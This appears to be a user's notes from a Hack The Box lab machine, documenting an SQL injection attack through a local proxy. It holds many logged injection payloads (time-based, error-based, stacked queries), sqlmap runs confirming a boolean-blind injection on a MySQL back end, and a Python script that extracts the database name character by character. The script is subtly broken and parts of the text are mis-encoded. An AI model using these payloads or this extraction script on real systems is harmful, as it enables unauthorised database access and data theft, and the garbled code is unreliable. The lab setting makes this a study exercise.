127.0.0.1 - - [05/mar/2023 11:41:18] "get /?id=1) and 4511 in (select (char(113)+char(107)+char(98)+char(122)+char(113)+(select (case when (4511=4511) then char(49) else char(48) end))+char(113)+char(113)+char(106)+char(106)+char(113))) and (7785=7785 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:21] "get /?id=1 and 4511 in (select (char(113)+char(107)+char(98)+char(122)+char(113)+(select (case when (4511=4511) then char(49) else char(48) end))+char(113)+char(113)+char(106)+char(106)+char(113))) http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:25] "get /?id=1 and 4511 in (select (char(113)+char(107)+char(98)+char(122)+char(113)+(select (case when (4511=4511) then char(49) else char(48) end))+char(113)+char(113)+char(106)+char(106)+char(113)))-- ngvp http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:29] "get /?id=1') and 4511 in (select (char(113)+char(107)+char(98)+char(122)+char(113)+(select (case when (4511=4511) then char(49) else char(48) end))+char(113)+char(113)+char(106)+char(106)+char(113))) and ('fmfx'='fmfx http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:32] "get /?id=1' and 4511 in (select (char(113)+char(107)+char(98)+char(122)+char(113)+(select (case when (4511=4511) then char(49) else char(48) end))+char(113)+char(113)+char(106)+char(106)+char(113))) and 'wosp'='wosp http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:35] "get /?id=1) and 1250=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(107)||chr(98)||chr(122)||chr(113)||(select (case when (1250=1250) then 1 else 0 end) from dual)||chr(113)||chr(113)||chr(106)||chr(106)||chr(113)||chr(62))) from dual) and (8326=8326 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:44] "get /?id=1 and 1250=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(107)||chr(98)||chr(122)||chr(113)||(select (case when (1250=1250) then 1 else 0 end) from dual)||chr(113)||chr(113)||chr(106)||chr(106)||chr(113)||chr(62))) from dual) http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:49] "get /?id=1 and 1250=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(107)||chr(98)||chr(122)||chr(113)||(select (case when (1250=1250) then 1 else 0 end) from dual)||chr(113)||chr(113)||chr(106)||chr(106)||chr(113)||chr(62))) from dual)-- igwg http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:53] "get /?id=1') and 1250=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(107)||chr(98)||chr(122)||chr(113)||(select (case when (1250=1250) then 1 else 0 end) from dual)||chr(113)||chr(113)||chr(106)||chr(106)||chr(113)||chr(62))) from dual) and ('xkdt'='xkdt http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:41:58] "get /?id=1' and 1250=(select upper(xmltype(chr(60)||chr(58)||chr(113)||chr(107)||chr(98)||chr(122)||chr(113)||(select (case when (1250=1250) then 1 else 0 end) from dual)||chr(113)||chr(113)||chr(106)||chr(106)||chr(113)||chr(62))) from dual) and 'qhru'='qhru http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:04] "get /?id=(select concat(concat('qkbzq',(case when (8028=8028) then '1' else '0' end)),'qqjjq')) http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:09] "get /?id=1 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:13] "get /?id=1);select pg_sleep(5)-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:22] "get /?id=1;select pg_sleep(5)-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:28] "get /?id=1');select pg_sleep(5)-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:32] "get /?id=1';select pg_sleep(5)-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:36] "get /?id=1);waitfor delay '0:0:5'-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:40] "get /?id=1;waitfor delay '0:0:5'-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:44] "get /?id=1');waitfor delay '0:0:5'-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:49] "get /?id=1';waitfor delay '0:0:5'-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:42:58] "get /?id=1);select dbms_pipe.receive_message(chr(76)||chr(77)||chr(105)||chr(113),5) from dual-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:04] "get /?id=1;select dbms_pipe.receive_message(chr(76)||chr(77)||chr(105)||chr(113),5) from dual-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:09] "get /?id=1');select dbms_pipe.receive_message(chr(76)||chr(77)||chr(105)||chr(113),5) from dual-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:16] "get /?id=1';select dbms_pipe.receive_message(chr(76)||chr(77)||chr(105)||chr(113),5) from dual-- http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:20] "get /?id=1) and (select 3123 from (select(sleep(5)))dzpr) and (4161=4161 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:30] "get /?id=1 and (select 3123 from (select(sleep(5)))dzpr) http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:39] "get /?id=1 and (select 3123 from (select(sleep(5)))dzpr)-- pyzb http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:47] "get /?id=1') and (select 3123 from (select(sleep(5)))dzpr) and ('awgx'='awgx http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:51] "get /?id=1' and (select 3123 from (select(sleep(5)))dzpr) and 'msuw'='msuw http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:54] "get /?id=1) and 6928=(select 6928 from pg_sleep(5)) and (3450=3450 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:43:58] "get /?id=1 and 6928=(select 6928 from pg_sleep(5)) http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:05] "get /?id=1 and 6928=(select 6928 from pg_sleep(5))-- alxw http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:09] "get /?id=1') and 6928=(select 6928 from pg_sleep(5)) and ('phjg'='phjg http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:13] "get /?id=1' and 6928=(select 6928 from pg_sleep(5)) and 'sugf'='sugf http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:17] "get /?id=1) waitfor delay '0:0:5' and (2874=2874 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:21] "get /?id=1 waitfor delay '0:0:5' http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:25] "get /?id=1 waitfor delay '0:0:5'-- lcpo http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:29] "get /?id=1') waitfor delay '0:0:5' and ('fvna'='fvna http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:33] "get /?id=1' waitfor delay '0:0:5' and 'axhq'='axhq http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:37] "get /?id=1) and 2581=dbms_pipe.receive_message(chr(72)||chr(84)||chr(112)||chr(66),5) and (3643=3643 http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:44] "get /?id=1 and 2581=dbms_pipe.receive_message(chr(72)||chr(84)||chr(112)||chr(66),5) http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:48] "get /?id=1 and 2581=dbms_pipe.receive_message(chr(72)||chr(84)||chr(112)||chr(66),5)-- umol http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:52] "get /?id=1') and 2581=dbms_pipe.receive_message(chr(72)||chr(84)||chr(112)||chr(66),5) and ('gqht'='gqht http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:44:56] "get /?id=1' and 2581=dbms_pipe.receive_message(chr(72)||chr(84)||chr(112)||chr(66),5) and 'vnil'='vnil http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:46:18] "get /?id=1) order by 1-- eayw http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:46:23] "get /?id=1) order by 4299-- hcgh http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:46:35] "get /?id=1 order by 1-- uolg http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:46:58] "get /?id=1 order by 5403-- krxs http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:47:12] "get /?id=1 order by 1-- vipb http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:47:24] "get /?id=1 order by 1950-- hlcp http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:47:28] "get /?id=1') order by 1-- cevj http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:47:32] "get /?id=1') order by 4026-- luyc http/1.1" 200 -

127.0.0.1 - - [05/mar/2023 11:47:36] "get /?id=1' order by 1-- smzk http/1.1" 200 -

try op by hand

for this i try sqlmap manymany times锛宐ut i can鈥檛 get the data

鈹屸攢鈹€(kwkl銐縦wkl)-[~]

鈹斺攢$ sqlmap -u localhost:8081?id=1 -p id --technique=b

___

__h__

___ ___[.]_____ ___ ___ {1.7.2#stable}

|_ -| . [.] | .'| . |

|___|_ [)]_|_|_|__,| _|

|_|v... |_| sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. it is the end user's responsibility to obey all applicable local, state and federal laws. developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:49:15 /2023-03-19/

[12:49:15] [info] testing connection to the target url

[12:49:20] [warning] turning off pre-connect mechanism because of incompatible server ('simplehttp/0.6 python/3.10.7')

[12:49:20] [info] testing if the target url content is stable

[12:49:24] [info] target url content is stable

[12:49:27] [warning] heuristic (basic) test shows that get parameter 'id' might not be injectable

[12:49:30] [info] testing for sql injection on get parameter 'id'

[12:49:30] [info] testing 'and boolean-based blind - where or having clause'

[12:49:50] [info] testing 'boolean-based blind - parameter replace (original value)'

[12:49:53] [warning] get parameter 'id' does not seem to be injectable

[12:49:53] [critical] all tested parameters do not appear to be injectable. try to increase values for '--level'/'--risk' options if you wish to perform more tests. rerun without providing the option '--technique'. if you suspect that there is some kind of protection mechanism involved (e.g. waf) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 12:49:53 /2023-03-19/

鈹屸攢鈹€(kwkl銐縦wkl)-[~]

鈹斺攢$ sqlmap -u localhost:8081?id=1 -p id --technique=b --level 5

___

__h__

___ ___[,]_____ ___ ___ {1.7.2#stable}

|_ -| . ['] | .'| . |

|___|_ [']_|_|_|__,| _|

|_|v... |_| sqlmap.org

[*] starting @ 12:50:02 /2023-03-19/

[12:50:02] [info] testing connection to the target url

[12:50:05] [warning] turning off pre-connect mechanism because of incompatible server ('simplehttp/0.6 python/3.10.7')

[12:50:05] [info] testing if the target url content is stable

[12:50:08] [info] target url content is stable

[12:50:12] [warning] heuristic (basic) test shows that get parameter 'id' might not be injectable

[12:50:15] [info] testing for sql injection on get parameter 'id'

[12:50:15] [info] testing 'and boolean-based blind - where or having clause'

[12:50:41] [warning] user aborted during detection phase

how do you want to proceed? [(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] quit

[12:50:43] [info] testing 'and boolean-based blind - where or having clause (subquery - comment)'

[12:50:50] [warning] user aborted during detection phase

quit

[12:50:57] [info] testing 'and boolean-based blind - where or having clause (comment)'

[12:50:59] [warning] user aborted during detection phase

how do you want to proceed? [(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] quit

[12:51:00] [info] testing 'and boolean-based blind - where or having clause (mysql comment)'

[12:51:02] [warning] user aborted during detection phase

how do you want to proceed? [(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] s

[12:51:03] [info] testing 'and boolean-based blind - where or having clause (microsoft access comment)'

[12:51:05] [warning] user aborted during detection phase

how do you want to proceed? [(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]

[12:51:06] [error] user quit

[*] ending @ 12:51:06 /2023-03-19

so i try python bool blind injection

# -*- coding: utf-8 -*-

import requests

import string

url = " localhost:8081?id=1"

#mark = "ticket exists"

notmark="doesn't"

mark="ticket exists"

database = ''

for i in range(1, 25):

for j in string.ascii_letters:

target = url ' ' ' or if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables)) --;' % (i, j)

r = requests.get(target)

if notmark not in r.text:

database = j

print(database)

print(r.text)

break

print('database:', database)

鈹屸攢鈹€(kwkl銐縦wkl)-[~/hodl/htb/soccer]

鈹斺攢$ python3 bool4soc\ copy.py 1 猕?/p>

ticket exists

soc

ticket exists

socc

ticket exists

socce

ticket exists

soccer

ticket exists

soccerd

ticket exists

soccerdb

ticket exists

these results make me confident that i can sqlmap it

so i try the command

鈹屸攢鈹€(kwkl銐縦wkl)-[~]

鈹斺攢$ sqlmap -u localhost:8081?id=1 -p id --technique=b --risk 3 --string="ticket exists"

___

__h__

___ ___[,]_____ ___ ___ {1.7.2#stable}

|_ -| . [,] | .'| . |

|___|_ [(]_|_|_|__,| _|

|_|v... |_| sqlmap.org

[*] starting @ 13:24:33 /2023-03-19/

[13:24:33] [info] testing connection to the target url

[13:24:39] [info] testing if the provided string is within the target url page content

[13:24:39] [warning] you provided 'ticket exists' as the string to match, but such a string is not within the target url raw response, sqlmap will carry on anyway

[13:24:39] [warning] turning off pre-connect mechanism because of incompatible server ('simplehttp/0.6 python/3.10.7')

[13:24:43] [warning] heuristic (basic) test shows that get parameter 'id' might not be injectable

[13:24:46] [info] testing for sql injection on get parameter 'id'

[13:24:46] [info] testing 'and boolean-based blind - where or having clause'

[13:25:24] [info] testing 'or boolean-based blind - where or having clause'

[13:25:47] [info] get parameter 'id' appears to be 'or boolean-based blind - where or having clause' injectable

[13:27:11] [info] heuristic (extended) test shows that the back-end dbms could be 'mysql'

for the remaining tests, do you want to include all tests for 'mysql' extending provided level (1) value? [y/n] n

[13:35:36] [warning] in or boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval

[13:35:36] [info] checking if the injection point on get parameter 'id' is a false positive

get parameter 'id' is vulnerable. do you want to keep testing the others (if any)? [y/n] n

sqlmap identified the following injection point(s) with a total of 45 http(s) requests:

---

parameter: id (get)

type: boolean-based blind

title: or boolean-based blind - where or having clause

payload: id=-6478 or 1585=1585

---

[13:36:30] [info] testing mysql

[13:36:36] [info] confirming mysql

[13:36:43] [info] the back-end dbms is mysql

back-end dbms: mysql >= 8.0.0

[13:37:00] [info] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'

[*] ending @ 13:37:00 /2023-03-19/

continue to try it is too slow